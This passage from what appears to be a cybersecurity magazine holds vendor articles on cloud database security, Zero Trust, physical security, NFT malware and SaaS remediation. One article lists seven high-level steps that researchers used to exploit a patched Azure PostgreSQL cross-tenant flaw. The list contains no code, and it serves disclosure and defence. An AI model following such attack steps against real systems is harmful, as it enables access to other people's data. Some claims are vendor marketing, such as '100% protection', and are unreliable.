Cyber criminals, like Lapsus$, are generally motivated by profit, so they attempt ransomware, DDoS and

other kinds of attacks and use extortion to make money. While these profiteering exploits are already

ubiquitous, the current geopolitical struggle among superpowers and their client-states across the globe

means that attacks which deliberately sow chaos and terror, as a goal in and of itself, outside of profit,

will likely rise in prominence too. The U.S. government warnings for businesses to be ready have been

clear.

Readiness Is Tougher for SMBs

In the next few years, many cloud security providers will do extremely well financially from all the

investment that will go into them. The better vetted providers’ services are, the more likely those providers

will grow and generate significant cash flow. Enterprises are pulling out their proverbial checkbooks,

hoping to fortify multiple layers of security now to avoid paying more down the road.

How companies can distinguish between a security provider that's offering excellent, multi-faceted data

protection and one whose solutions might not be fully baked is a good question—and presents a sort of

Catch-22. Companies must employ at least a few highly competent professionals who already have

knowledge of what constitutes good security in order to evaluate tools. This can be a challenge for a lot

of organizations, but especially for smaller ones. Small and medium-sized businesses (SMBs) can

struggle to maintain in-house experts to secure their systems, choose the right security vendors, mitigate

attacks and implement recovery. SMBs also might have an expert who knows what to do, but who

doesn’t have the resources to do it. Some SMBs are simply operating on slim margins, without deep

pockets to pay ransoms. They face even more uncertainty right now if they exist in an industry or segment

of the supply chain that’s targeted for geopolitical reasons. Having distributed, remote workforces as the

new normal furthers the challenges.

178

So, this is the moment where those building future-proofed cloud tools and services can step in and help

SMBs, as well as large enterprises. Keeping cloud databases secure is central to minimizing the damage

attackers can do and reducing the strain on limited resources.

What’s Cloud Database Security Look Like in a Zero-Trust World?

VPNs and perimeter security are fast becoming anachronisms in a world of distributed workers and

systems, and of cyber attackers who have long since figured out how to breach the traditional network

shield. Zero trust approaches to security are indeed the way forward—where no entity is trusted and only

those privileges needed for a person, application or microservice to complete its task are granted. To use

an office metaphor, a worker must swipe a badge to get into the building, but there are still doors that are

bolted and, within accessible rooms, desks and filing cabinets with their own locks. Just because

someone’s authorized to be in the office, doesn't mean they’re authorized to look at all the files.

Cloud databases are a special animal when it comes to zero-trust security. They have complex properties

but, right now, beyond access policies, zero trust is enforced at the application level and in the movement

of data to and fro, rather than inside the database itself. It may be that row-level and field-level encryption

can be embedded in a cloud database, but that’s not a feature in general use now.

That said, here are the must-haves for security:

• Choose a cloud database with configurations that are secure by default, not open by default.

Misconfiguration is one of the biggest issues that results in data breaches. This doesn’t

necessarily mean that dials are tuned to the absolutely most locked down settings, but a well

configured baseline security is a must-have. A vendor that offers 24/7 help with configuration and

other questions from experts intimately familiar with the nitty-gritty of the chosen database isn’t a

bad idea either.

• Use network isolation with a virtual private cloud or connection (VPC) or private link. It’s a best

practice to keep a cloud database completely isolated from the public internet. Ensure there's no

possibility that an external connection can get to your database.

• If not using a VPC, restrict access by IP address not just on the firewall, but at the database and

database proxy level. Firewalls generally can’t distinguish between an approved user and an

attacker. Maintaining thousands of firewall rules adds complexity. Completely firewall the

database off by default. Explicitly add IP addresses to an allow-list to grant access, so that there's

no external connections permitted except for what you explicitly add.

• Enforce unique accounts with strong passwords. Give different application servers and different

users all their own accounts; give them all strong passwords and rotate those passwords. Reusing

accounts and passwords increases the risk of exposure.

179

• Use multi-factor authentication and enhanced, granular access control that seeks constant

validation of entities seeking data. Limit accounts to the data they need to access. That is, enforce

least privilege access to sensitive data and implement alerts on suspicious activities and policy

violations. As humans, sometimes we want to be flexible with teams, but even with implicit trust,

people make honest mistakes. Resist the urge to be lax with least privilege access rules. Keep

good separation of roles and functions. Also control DBA access to the database activity stream.

• Monitor database activity rigorously. Monitoring the real-time data stream of database activity for

unusual or non-compliant behaviors helps protect against insider risks. Use policy-based

monitoring and enforcement. Ensure detection of database misconfiguration that exposes

vulnerabilities.

• Implement key data protection measures including encryption of data in transit and backups at

rest, and automate the patching of vulnerabilities.

• Make sure offsite logs and backups are immutable. Logs and backups should be protected from

everyone, including your administrative account. If attackers compromise DBA credentials, they

will not be able to go in and delete backups. Backups must be set in stone.

• In a system leveraging cloud microservices architecture, for “east-west” communications inside a

network, use microsegmentation, which isolates workloads in order to neutralize malicious lateral

movement. With this approach, certain kinds of service mesh proxy filters can produce metadata

to stop writes into a database, so that a packet will never reach the database, thus containing

data breaches.

• Have a clear, detailed plan ready to deal with major events like cloud outages, ransomware

attacks and data breaches. Talk to your cloud vendor about this and coordinate plans. The major

cloud providers all go down on a regular basis. It's just limited to different data centers, so often

unnoticed. A plan should explain exactly how the team is expected to respond to a disaster and

who does what. It should specify who to contact at your cloud vendor to help with an investigation

of a data breach. The vendor should have a plan to work with customers who experience data

breaches. Backups that attackers can't touch should be ready, with the plan specifying how to roll

out a restored backup.

Businesses across verticals and at all resource levels are increasingly relying on data to function and to

deliver new value. These security measures for cloud databases are the last line of defense in keeping

data protected. Security decision-makers at companies small and large should talk with vendors directly

and make sure that their first focus is on security that’s built to complement performance, rather than

compete with it. Study reviews and articles on trusted sites. Go to webinars, talk to trusted colleagues

and reach out to industry peers in reputable organizations. And feel free to reach out to me! Risking a

data breach because it seems like your hands are tied is no longer an option for businesses in a world of

exponential data growth, evolving technology and deep uncertainty.

180

About the Author

Bryan Alsdorf, Director of IT and Head of Information Security, oversees

all IT and security operations at MariaDB. Bryan has more than 25 years

of IT industry experience including 14 years at MariaDB and 5 years at

MySQL. Bryan can be reached online at

https://www.linkedin.com/in/bryanalsdorf/ and at our company website

https://mariadb.com/.

181

Cybercrime is on an extremely worrying trajectory.

A previous survey of global IT security decision makers conducted by Statista revealed that 46.4% of

organizations had endured between one and five successful cyber-attacks in the 12 months ended

November 2020. Since then, Accenture has reported that such attacks increased 31% between 2020

and 2021.

As we now move through 2022, this concerning reality is further compounded by even more frightening

figures.

According to IBM, the average cost of a data breach last year was $4.24 million, and this number is

predicted to rise in 2022. Resultantly, Cisco and Cybersecurity Ventures together suggest that come

2025, the global cost of cybercrime could exceed $10 trillion.

Cybersecurity: Why We’re Stronger Together

Advocating for greater security collaboration between businesses, law enforcement and

government

By Nicole Mills, Exhibition Director at Infosecurity Group

182

The Infosecurity Group Advisory Council comprising industry leaders at the cutting edge of cybersecurity

solution highlight many varying factors contributing to this broad and growing challenge.

Unsurprisingly, ransomware was pinpointed as an area of particular concern. While individuals, criminal

groups and nation states will continue to favour ‘tried and tested’ approaches, they are expected to

employ these in novel ways to generate revenue from attacks.

Indeed, more sophisticated attacks leveraging new methodologies are becoming more commonplace,

and supply chain attacks have emerged as a prime example. Businesses now need to realise that their

security relies on a web of third-party suppliers, and that they’re only as strong as the weakest link.

At the same time, the council affirmed that information security investment is, generally, still not

sufficiently prioritised within businesses or government.

Greater collaboration is critical

The point is that there are a multitude of evolving threats, and attitudes and mindsets simply must change

in order to keep up.

Cybercriminal networks today are expanding, evolving, advancing and working together to target victims

more successfully than ever before. Ransomware-as-a-service, for example, is dramatically lowering the

barriers-to-entry for attackers, with savvy cybercriminals actively supporting the threat ambitions of less

technically abled perpetrators at scale.

To even stand a chance in the fight taking place amid this increasingly complicated landscape,

cybersecurity professionals must equally collaborate by sharing knowledge and experiences to support

each other in identifying vulnerabilities and developing stronger security strategies.

Promisingly, there is agreement within our community that greater cooperation will help.

According to an Infosecurity Europe Twitter poll conducted in January 2022, 45% of the 2,543

respondents pointed to advanced threat detection is the cybersecurity challenge that would benefit most

from increased industry collaboration. This was followed by social engineering threats (22%), incident

response planning (18%), and governance, risk and compliance (15%).

With a clear appreciation that greater collaboration within cybersecurity will bring major advantages, it’s

vital that we act as a united industry to overcome any barriers that might be stifling this. I believe we must

work together to build an environment of trust and transparency where we can exchange knowledge,

resources and ideas to combat security threats while protecting commercial sensitivities.

Events as pillars of security progress

It is for this reason that we chose Stronger Together as the theme for Infosecurity Europe 2022 – to try

to encourage greater collaboration between businesses, law enforcement and government.

183

Over the years I’ve seen first-hand the vital role that events play in facilitating cross-sector cooperation,

instigating vital discussions that sew the seeds of greater security progress.

Every organisation from every operational background has a unique vantage point – different approaches

that have been moulded by different experiences. By exchanging these experiences, approaches and

ideas, we can support each other in achieving best practice, gaining practical and actionable knowledge

that can help in keeping up with the increasing sophistication of security threats.

Events are vital platforms from which we can achieve a great deal. From seasoned professionals to those

just starting out, everyone has value to add, and everyone can benefit.

In the case of Infosecurity Europe 2022, topics will range from everything from the need to tackle insider

threats, building a security culture, the paradigm change in ransomware and monetisation of threats to

cybercrime-as-a-service (CaaS), third party risk, how cyber criminals are changing their approaches, and

improving detection of known and unknown threats.

Covering all these bases is critically important. When it comes to security, there are always more

opportunities to learn. By expanding our collective knowledge, sharing insights and advocating for the

broad adoption of best practices, we can begin to tackle the escalating problems of cybercrime and turn

the tide together as a unified industry.

About the Author

Nicole Mills is Exhibition Director for the Infosecurity Group. With

over 20 years’ experience in events and media, she has worked

with many brands responsible for strategic and commercial growth.

Nicole has worked in the Infosecurity Group for six years working

with the Infosec team responsible for Infosecurity Europe and

Infosecurity Magazine. Working with the team the aim is to bring

the cyber community together to showcase the latest products and

solutions to enable businesses to continue to protect themselves.

Nicole can be reached online at www.linkedin.com/in/nicolemmills/

and at our company website www.infosecurity-group.com

184

Why Physical Security Should Be Part of a

Cybersecurity Strategy

By David Weingot, Founder and CEO, DMAC Security

Our modern world is full of various types of physical and cyber-related threats. The war in Ukraine is

ramping up Russian attacks on American targets, and the talk of a cyberattack is not out of the realm of

possibility. It is essential for businesses to be prepared for any kind of attack, and that includes a

combination of both physical and cybersecurity. As the Cybersecurity and Infrastructure Security Agency

states “A successful cyber or physical attack on industrial control systems and networks can disrupt

operations or even deny critical services to society.”

Together, cyber, and physical assets represent a significant amount of risk to physical security and

cybersecurity – each can be targeted, separately or simultaneously, to result in compromised systems

and/or infrastructure.”

185

What is Physical Security?

Physical security refers to personnel who are assigned to keep people, property, and other physical

resources safe from danger. Often these professionals are called security guards, officers, or security

specialists.

Many organizations use physical security to keep customers, employees, vendors, and guests safe.

Examples include schools, hospitals, banks, retail stores, corporations, government facilities, etc.

Physical security covers a lot of different responsibilities such as patrolling grounds, monitoring inbound

and outgoing traffic, surveillance, locking and unlocking buildings, securing off-limits areas, responding

to alarms, dealing with emergencies, first aid, and much more.

Why is Physical Security Needed in a Cyber Attack?

These days physical and cybersecurity go hand-in-hand. Devices, systems, and networked equipment

are often targeted to prepare for a more significant cyber-attack. For example, in 2021, 150,000 security

cameras were hijacked, allowing criminals to access surveillance feeds from hospitals, jails, police

stations, and even schools.

Companies are using more technology than ever before, and a lot of it is vulnerable to hacking.

Cybercriminals often use botnets to take over thousands of IoT devices and then use them for attacks.

Companies may not even be aware that their devices have been compromised.

It’s essential for physical security personnel to work closely with IT departments to ensure the safety of

physical devices and maintain strict access to them to prevent cyber-attacks. Another big area for concern

is BYOD (bring your own device). Physical security can use sensors to monitor for and prevent malicious

devices from entering the building (e.g., removable devices like USB drives, cell phones with malware,

etc.).

Hundreds of data breaches have put companies, vendors, employees, and customers at risk. Security

personnel should be stationed wherever data is stored and protect servers, computers, mobile devices,

and other networked technology to prevent any unauthorized access. A data breach can devastate a

company bankrupting its resources.

Many newer corporate structures use automation to control heat and ventilation. Abusers may gain

access and alter the environment to overheat or destroy specific technology. Other targeted areas may

include communications, hardware or software vulnerabilities, and weak password management.

Along with the physical aspect of security, IT departments should also enhance cybersecurity measures

and network monitoring to cover all angles that a cyber-terrorist might use to gain access.

186

The Bottom Line

Technology continues to evolve at a rapid pace. Cybercriminals are innovating new attack methods all

the time. It’s critical for any business, especially supply chain companies, to keep up with the threats by

using both cybersecurity best practices with ample physical security to prevent access that could cause

further damage and keep everyone calm and organized in the event of an attack.

About the Author

David Weingot is the founder and CEO of DMAC Security, an

established full-service armed and unarmed security firm built upon over

30 years of law enforcement experience and management.

David can be reached online at dweingot@dmacstrategic.com and at our

company website https://dmacstrategic.com/. You can follow us on:

Facebook, LinkedIn and Instagram.

187

188

Zero Trust Architecture: Adoption, Benefits,

and Best Practices

What is Zero Trust security, and what are the benefits? Here's how to prevent data breaches by staying

on top of security with Zero Trust architecture.

By Harish Akali, Chief Technology Officer, ColorTokens

'Trust Nothing, Verify Everything': Benefits and Best Practices of Zero Trust Architecture

No matter the industry or size, organizations have been embracing digital transformation at an

astonishing pace. Necessarily, the cybersecurity industry is seeing a shift that many argue is long

overdue. This is best described as a paradigm shift from reactive to proactive security that assumes the

bad guys will get in. This is also the paradigm of Zero Trust architecture, which is built to stop the bad

guys in their tracks from the inside out if need be.

Businesses today are essentially massively interconnected attack surfaces. Meanwhile, the maximization

of telework and cloud computing are supersizing the number of attack vectors. Enterprise networks with

traditional security have become a playground for bad actors, who rely on taking advantage of any

processes, access, or traffic that are “trusted” to stay undetected. This is where Zero Trust

architecture comes into play with its credo of “trust nothing; verify everything.”

189

Even President Joe Biden is among the proponents of Zero Trust architecture. As this wide embrace of

Zero Trust is growing, security professionals want to know how they can make Zero Trust a reality for

their enterprise. Many are coming to learn that Zero Trust is a journey, and understanding this journey is

the first step down the path.

If you wish to dive deeper into the topic of Zero Trust, we’ve made a FREE copy of the first and only “The

Definitive Guide to Zero Trust Security“ available to all Cyber Defense Magazine readers.

First, you may be asking, ‘What is Zero Trust security?'

Zero Trust security can be summed up with the phrase, “Trust nothing, verify everything.” Resource

access within a network is always limited by trust dimensions — and access is revoked if these

parameters are ever unmet. It provides a 180-degree turn from traditional security models that provide

implicit trust within the network.

For the most part, the principles of Zero Trust architecture can be broken down into the following

components:

• Network traffic is untrusted. This is true even if traffic originates internally. Inspection, authentication,

and documentation are always necessary.

• Micro-segmentation is applied. No user can roam freely throughout the infrastructure.

• Each entity is low trust. An entity will gain only a specific level of trust.

• Zero Trust doesn’t mean no trust. Upon verification, entities are given appropriate, yet restricted,

access that is limited to the function they must perform.

• Trust is dynamic. Trust may be granted, but it isn’t constant.

• Trust is impartial. All users and entities will be assessed using the same criteria.

• Least privilege access always applies. Trust is granted based on what’s needed to perform the

entity’s intended functions.

When each of these principles comes together, IT teams can achieve long-term cyber resiliency.

The Benefits of Zero Trust Security

• Secure cloud migrations.

IT teams gain the ability to visualize, monitor, and control network traffic with platforms like the Xtended

ZeroTrust™ Platform — even those running in virtual machines and containers. If integrated with cloud

management tools, Zero Trust also ensures that security policies move with workloads upon cloud

migration.

190

• Increased visibility into lateral movements.

Threats can go unnoticed as they move laterally across networks. With the granular visibility provided by

end-to-end Zero Trust platforms, IT teams gain 360-degree visibility and control of their environments.

• Data breach prevention.

By isolating high-value assets, IT teams can restrict access to all users, services, devices, and platforms

other than those parties authorized as “need to know,” circumventing any widespread data breaches.

• Data breach resilience.

Legacy systems are often wide open to the network and lack the isolation necessary to limit a

breach. Zero Trust architecture platforms divide systems into micro-segments, building greater cyber

resilience for companies.

• Massively reduced attack surface.

Providing access to only those assets and workloads that users need creates smaller trust zones,

reducing the attack surface and restricting unauthorized lateral movements should cybercriminals gain

access.

• Greater compliance.

Isolating high-value assets alone strengthens compliance, but Zero Trust security also prevents

unauthorized access by internal and external parties, generates privacy-related regulation

documentation, and establishes a wall between development and production within an organization.

• Limited scope of compliance audit.

With segmentation being the initial step of Zero Trust security, companies limit the scope of a PCI-DSS

audit by showing evidence of segmentation across the data center, cloud providers, and business

locations.

• Mitigated risk from legacy systems.

For example, many of our manufacturing clients operate with legacy, end-of-life systems that aren't

replaceable or easy to upgrade for budget or business reasons. These outdated systems, however, are

unpatched with no support, setting the stage for cyberattacks. Securing these legacy systems quickly

and for long-term resiliency is to prevent the movement of ransomware is possible with Zero Trust.

Basic Steps of Zero Trust Implementation

Zero Trust architecture isn’t a “set-and-forget” solution to cybersecurity. As your organization begins

preparing to implement Zero Trust security, it’s important to keep in mind the following:

191

1. Map the environment.

Mapping the environment gives IT teams a clearer picture of the task ahead. With most companies

containing many moving parts, start with one application or workload to get a grasp on the number of

users, amount of traffic, required applications, and connections between all entities.

2. Define trust zones.

Trust zones are basically data assets that should be segmented, monitored, and protected as units, falling

under a set of access policies. Automation can assist in identifying trust zones by looking at workloads

in the same network segment, but always make sure to have human administrators verify that zones

align with business practices.

3. Create security policies.

Security policies will dictate access not only to assets, but also between trust zones. Powerful policy

engines will help by recommending policies, which will streamline the process.

4. Observe traffic between trust zones.

Schedule an observation period to capture the traffic patterns between established trust zones. You may

find that certain parties need access to perform urgent tasks, and setting authentication boundaries

between these zones could impact mission-critical activities. This is part of “building the muscle,” which

will get stronger over time.

5. Monitor and refine zones and policies.

Applications come and go. Workflows change. Team members are always on the move. Naturally, you’ll

need to track and adapt the policies that protect high-value assets. It’s important to build in some flexibility

and adaptability into Zero Trust architecture and the security tools used to enforce authentication.

For the ultimate breakdown of Zero Trust best practices and implementation, download a free copy of

the first and only “Definitive Guide to Zero Trust Security.”

Best Practices for Zero Trust Implementation:

With Zero Trust implementation being a new initiative, the chances are good that your organization will

experience some growing pains with Zero Trust architecture. This isn’t uncommon — nor should it serve

as an excuse to abandon the new measures. In our experience, these tactics can often be of benefit:

1. Go zone by zone.

“Boiling the ocean” is never a good idea with Zero Trust architecture. Instead, enforce policies trust zone

by trust zone. Perhaps start with your highest-value application and expand out from there.

192

2. Use orchestration for DevOps.

Integrating DevOps with cloud infrastructure tools can help protect data, applications, and workflows

within cloud platforms when moved to Zero Trust architecture.

3. Update policies.

Zero Trust security is a dynamic environment. IT teams should be monitoring both policy violations and

new connections that might require new policies. Update policies and enact new ones based on the

findings. Again, the right policy engine can streamline this.

4. Extend Zero Trust to endpoints.

The same principles should be applied to all endpoints within an organization, including servers, laptops,

PCs, and mobile devices. Traffic can help to identify where to direct IT attention. Only authorized

processes should run at these endpoints, thereby reducing the risk of cyberthreats.

Zero Trust architecture should do more than stitch together security protocols. It can help an organization

establish a set of rules and control to determine which entities can gain access to restricted locations and

critical information within a company.

Selecting the Right Zero Trust Vendor

Not all Zero Trust vendors are created equal. In fact, some tout their products and services as “Zero

Trust” without following through. This makes the selection process of a Zero Trust vendor suited to your

organization more important than ever. Here are just a few of the criteria to keep in mind as you arrive at

a decision:

• Platform approach.

A Zero Trust architecture should span the entire network, regardless of location. So naturally, point

security tools cannot achieve unified context and control and will leave organizations with a fragmented

Zero Trust posture. What’s needed is a single platform that provides end-to-end Zero Trust for workloads,

users, endpoints, and applications. Such platforms like the eXtended ZeroTrust™ Platform can deliver

Zero Trust at scale.

• Cloud delivery.

If your organization has already made the move to the cloud, look for a Zero Trust vendor that operates

on cloud platforms. This ensures that the vendor and its security platform can scale with your operations.

• Scope of capabilities.

If a vendor doesn’t enable greater visibility and micro-segmentation cloud security, move on. You need

the ability to monitor the network and divide data assets to limit and respond to cyberthreats.

193

• Breadth of protection.

Zero Trust zones are essential to Zero Trust architecture and should offer control over a wide range of

resources. Look for the capability to define user groups and create policies that control access to

resources.

• Ease of implementation and management.

While Zero Trust vendors should always be on hand to offer support, the ideal choice will provide access

to the security tools and resources to take internal control. Your IT team should have the capacity to

classify user groups, create connection maps, adjust policies, and so on, without a call to the vendor.

• Integration of other security tools.

Zero Trust vendors should offer platforms that can share information with other security tools, including

cloud service provider security; management and logging technologies; security information and event

management systems; and orchestration and automation tools. Otherwise, the transition and

enforcement won’t be as smooth as you’d hoped.

• Total cost of ownership.

As with anything in business, it all comes down to budget. Narrowing the field of potential Zero Trust

vendors should account for more than implementation costs. Factor in licensing and maintenance costs,

as well as the cost for initial implementation and ongoing connection monitoring.

Above all else, it’s important to factor in the savings you’ll gain when your operations have all the proper

controls in place to protect high-value assets, applications, and other resources. The wrong choice can

affect you for years to come.

If you’d like to learn more about what ColorTokens’ award-winning Zero Trust approach can do for your

organization, please let us know. A member of our team would be more than happy to review your

operations and develop a solution that’s customized to your critical assets.

About the Author

Harish Akali is the Chief Technology Officer at ColorTokens , Inc., a

leading innovator in SaaS-based Zero Trust cybersecurity solutions. As a

member of the ColorTokens leadership team, he uses his extensive

knowledge of cybersecurity and enterprise software across multiple

industries to drive innovation.

194

195

April, 2022 Microsoft reported that vulnerabilities in its Azure Database for PostgreSQL could

have let Hackers gain access to other customers' databases after bypassing authentication. "By

exploiting an elevated permissions bug in the Flexible Server authentication process for a

replication user, a malicious user could leverage an improperly anchored regular expression to

bypass authentication to gain access to other customers’ databases" the Microsoft Security

Response Center reported.

The cloud security firm Wiz's research team discovered the security vulnerabilities. An attacker

could create a full copy of a target database in Azure PostgreSQL [Flexible Server], essentially

exfiltrating all the information stored in the database, says Ami Luttwak, co-founder and CTO at

Wiz.

Microsoft said it mitigated the issue on Jan. 13, 2022, less than 48 hours after Wiz had notified

it of the issue. Microsoft said its analysis showed no evidence of attackers having exploited the

vulnerabilities to access customer data. Wiz said Microsoft awarded its researchers a $40,000

bug bounty — the amount can be viewed as confirmation of the vulnerability’s severity.

Azure PostgreSQL User Databases Were

Exposed Due to Critical Vulnerabilities

By Randy Reiter CEO of Don’t Be Breached

196

How to Have Exploited the Database Vulnerability

As explained by Microsoft, the Wiz researchers went through the following steps to gain elevated

privileges and remote code execution, which allowed them to bypass cross-account

authentication using a forged certificate and access other customers' databases:

1. Choose a target PostgreSQL Flexible Server.

2. Retrieve the target’s common name from the Certificate Transparency feed.

3. Purchase a specially crafted certificate from DigiCert or a DigiCert Intermediate Certificate

Authority.

4. Find the target’s Azure region by resolving the database domain name and matching it to

one of Azure’s public IP ranges.

5. Create an attacker-controlled database in the target’s Azure region.

6. Exploit vulnerability #1 on the attacker-controlled instance to escalate privileges and gain

code execution.

7. Scan the subnet for the target instance and exploit vulnerability #2 to gain read access!

How to Prevent Data Exfiltration and Data Breaches in Todays Complex Environment

Multiple layers of data protection are required today to prevent Data Exfiltration and Data

Breaches. In 2020 the DHS, Department of State, U.S. Marine Corps and the Missile Defense

Agency recognized this and all issued requests for proposals (RFP) for network full packet data

capture for Deep Packet Inspection analysis (DPI) of network traffic. This is an important step

forward protecting confidential database data and organization information.

Zero-day vulnerabilities that allow hackers to gain system privileges are a major threat to all

organizations encrypted and unencrypted confidential data. Confidential data includes: credit

card, tax ID, medical, social media, corporate, manufacturing, trade secrets, law enforcement,

defense, homeland security, power grid and public utility data. This confidential data is almost

always stored in DB2, Informix, MariaDB, Microsoft SQL Server, MySQL, Oracle, PostgreSQL

and SAP Sybase databases.

197

How to Stop Data Exfiltration and Data Breaches with Deep Packet Inspection

Protecting encrypted and unencrypted confidential database data is much more than securing

databases, operating systems, applications and the network perimeter against Hackers, Rogue

Insiders and Supply Chain Attacks.

Non-intrusive network sniffing technology can perform a real-time Deep Packet Inspection (DPI)

of 100% the database activity from a network tap or proxy server with no impact on the database

servers. The database SQL activity is very predictable. Database servers servicing 1,000 to

10,000 end-users typically process daily 2,000 to 10,000 unique queries or SQL commands that

run millions of times a day. Deep Packet Analysis does not require logging into the monitored

networks, servers or databases. This approach can provide CISOs with what they can rarely

achieve. Total visibility into the database activity 24x7 and 100% protection of confidential

database data.

Advanced SQL Behavioral Analysis from DPI Prevents Data Exfiltration and Data Breaches

Advanced SQL Behavioral Analysis of 100% of the real-time database SQL packets can learn

what the normal database activity is. Now the database query and SQL activity can be non-

intrusively monitored in real-time with DPI and non-normal SQL activity immediately pinpointed.

This approach is inexpensive to setup and has a low cost of operation. Now non-normal

database activity from Hackers, Rogue Insiders or and Supply Chain Attacks can be detected in

a few milli seconds. The Security Team can be immediately notified and the Hacker session

terminated so that confidential database data is not stolen, ransomed or sold on the Dark Web.

About the Author

Randy Reiter is the CEO of Don’t Be Breached a Sql Power

Tools company. He is the architect of the Database Cyber

Security Guard product, a database Data Breach prevention

product for DB2, Informix, MariaDB, Microsoft SQL Server,

MySQL, Oracle, PostgreSQL, and SAP Sybase databases. He

has a Master’s Degree in Computer Science and has worked

extensively over the past 25 years with real-time network sniffing

and database security. Randy can be reached online at

rreiter@DontBeBreached.com, www.DontBeBreached.com and

www.SqlPower.com/Cyber-Attacks.

198

NFTS Are Cool but Dangerous

By Guy Rosefelt, CPO, Sangfor Technologies

NFTs have become very popular with collectors and are more ubiquitous every day. The idea of owning

a one-of-a-kind object even in the digital world is very attractive. The idea is not new as buying unique

items inside games has been around for decades. But artists and creatives of all types, be it painting and

graphics, music, photography, and even video can now create and sell unique works that cannot be

replicated.

First, I need to disclose I am not a huge fan of Non-Fungible Tokens (NFTs). Besides security issues,

they are being used by criminals for money laundering of cryptocurrency, and I do not see the value in

something that will immediately become worthless when the internet apocalypse happens and your NFT

wallet is no longer accessible. But that is just me. Until that happens let’s talk about the security issues.

Security issues include phishing scams to access crypto-wallets and steal NFTs, and selling counterfeit

items, but the issue I want to discuss is using NFTs to distribute malware.

VIA, a company that specializes in solutions for infrastructure and government, reported that they

discovered instances of malware being injected into NFTs and demonstrated how easy it is. It makes

sense as NFTs are normally media files that have historically been used to inject code or embed malicious

software that runs when open. All being an NFT does is verify that it is the only file of its kind using

199

blockchain. But it does nothing to verify the safety of the file. VIA has even created an open-source tool

to scan NFTs to look for malicious code or software in the file.

So, the next time you spend thousands of dollars on an NFT, make sure, even if it comes from a reputable

vendor, to scan it before opening it and hope there is a return policy if you find something unexpected.

Otherwise, your crypto wallet might have a surprise for you once the internet apocalypse ends.

About the Author

Guy Rosefelt, Chief Product Officer, Sangfor Technologies.

Guy is Chief Product Officer for Sangfor Technologies. He has over

20 years experience (though some say it is one year’s experience

twenty times) in application and network security, kicking it off with 10

years in the U.S. Air Force, reaching rank of captain. After his time in

the USAF building the first fiber to the desktop LAN and other things

you would find in Tom Clancy novels, Guy worked at NGAF, SIEM,

WAF and CASB startups as well as big-name brands like Imperva

and Citrix. He has spoken at numerous conferences around the world

and in people's living rooms, written articles about the coming

Internet Apocalypse, and even managed to occasionally lead teams

that designed and built security stuff. Guy is thrilled to be in his current position at Sangfor -- partly

because he was promised there would always be Coke Zero in the breakroom. His favorite cake is

German Chocolate.

Guy can be reached online at guy.rosefelt@sangfor.com or on Twitter at @otto38dd and at our company

website www.sangfor.com.

200

201

For years organizations were leveraging more and more Software-as-a-Service applications to help team

members collaborate, improve efficiency, and manage other on-the-job tasks. As the pandemic took hold

and more employees started working remotely, the reliance on these applications has only increased.

While these applications helped improve productivity, they have also expanded organizations’ attack

surfaces, limiting visibility and control. While these solutions remove some of the burden associated with

updates and patches, they also create new attacker entry points that are much harder to locate and

remove. The complexity of identifying, analyzing and remediating these issues can easily overwhelm an

already overburdened security team.

The Need for Automated Remediation in

Saas Security

By Noam Shaar, Co-Founder & CEO, Wing Security

202

There’s where automated remediation steps in.

As its name suggests, automatic remediation manages fixes and upgrades without human intervention.

Organizations can establish the automated remediation rules their system follows, instructing the tool to

disable or uninstall low security scored apps when users ignore a warning email or remove risky

connection between applications (app2app), for example.

Remediation is always on, applying to new apps and new users, even with the decentralized nature of

SaaS projects. You don’t have to worry about adding these new apps and users to the remediation

process thanks to automated remediation.

The Need for Automatic Remediation

For security teams, automatic remediation provides a valuable service. Starting with increased visibility

and analysis, a trusted automated remediation solution can address newly identified issues with minimal

human interaction. Not only does it improve accuracy – human error is always a present cybersecurity

concern – but it can free cyber teams to focus on more important tasks.

Automatic remediation aims to provide an additional layer of security. While technology teams should not

see it as an exemption to perform updates and not follow security best practices, the automation process

can reduce some of the overall risks.

Security teams already find themselves pulled thin, juggling long-term planning and investments with

day-to-day needs. Automatic remediation can remove some of that daily burden. This is critical as

organizations continue to see the use of SaaS applications grow.

As companies continue to scale, automatic remediation is not just needed but essential. There are simply

too many applications and security events for manual remediation to be effective, something made even

more difficult with the lack of security professionals in the job market.

A Growing Attack Surface

The use of authorized SaaS applications and unauthorized shadow IT create more avenues for hackers

to gain entry into your larger enterprise. With these doorways, hackers can navigate your network to find

valuable information, such as your company’s financial records, intellectual property, or the personally

identifiable information (PII) of customers and employees.

As this study shows, PII has grown 20-fold in companies that use SaaS applications. Managing this

growing attack surface, which has expanded with increased remote work efforts as employees work on

different networks, presents an enormous challenge. Even the best trained and dedicated security teams

will struggle to keep pace.

203

SaaS applications have become a critical part of today’s work environment. Too often, though, users

believe these tools are already secure since they come from a big name company or are widely used.

This sense of security often comes at a price.

The Wing Difference

At Wing Security we offer a comprehensive end-to-end SaaS security platform that can help businesses

discover, monitor and remediate potential security issues. This past March, we came out of stealth mode

and are excited to show how our solution can remediate security for more than 100,000 SaaS

applications.

We provide customers with a holistic solution that provides end-to-end coverage. Our platform discovers

all the SaaS solutions used inside a company without having to install agents on users’ devices. Wing

integrates with SaaS applications and then looks for activity and the potential connections between them

and your organization.

Wing also integrates with endpoints. Our platform regularly queries endpoints to gather information about

what SaaS applications employees use on those machines, helping to discover all the SaaS applications

in use and offer security.

The Road Ahead

As your organization grows, ensure that your employees understand the importance of making regular

security updates. Empower your employees to identify and report security vulnerabilities and participate

in cyber defense.

Automating these steps can help reduce some of the burdens on individual users. It also signals that it is

essential when they are requested to take action. Look for SaaS security management tools to automate

as much of this process as possible.

SaaS continues to change the way that the workforce operates. Today’s remote working environment

would not be possible without the thousands of SaaS applications organizations use. There are additional

security components that must be addressed. Technology leaders can use these programs securely,

protect important assets, and empower employees with the right tools in place.

204

About the Author

Noam Shaar is the CEO and Co-Founder of Wing Security. After

completing a number of leading positions in IDF’s 8200 unit,

retired Brigadier General Noam Shaar took on the role of IDF’s

Chief Information Security Officer, managing the military’s

security end to end. His background provides him with an up

close and personal understanding of the pains and worries of

today’s security leaders. He led large cyber organizations and

operations and is no stranger to the problem at hand. Noam can

be reached online through LinkedIn and at our company website

https://wing.security/

205

206

Protect Your Executives’ Personal Digital

Lives to Protect Your Company

By Dr Chris Pierson, BlackCloak Founder & CEO

Earlier this year, news broke that Chinese hackers had been caught sending sophisticated phishing

emails to the personal Gmail accounts of US-government agency employees. While the nation-state

cybercriminals exact motivations will never be fully understood, many believe that they were targeting

personal email accounts to circumvent the agency’s robust cybersecurity and gain entry through lateral

movement into the digital infrastructure.

As the lines between the professional and personal have almost completely blurred, this type of lateral

cyberattack is increasingly common; and it poses a major threat to the enterprise. Today, the soft

underbelly of enterprise security has become the personal digital lives - the online privacy, personal

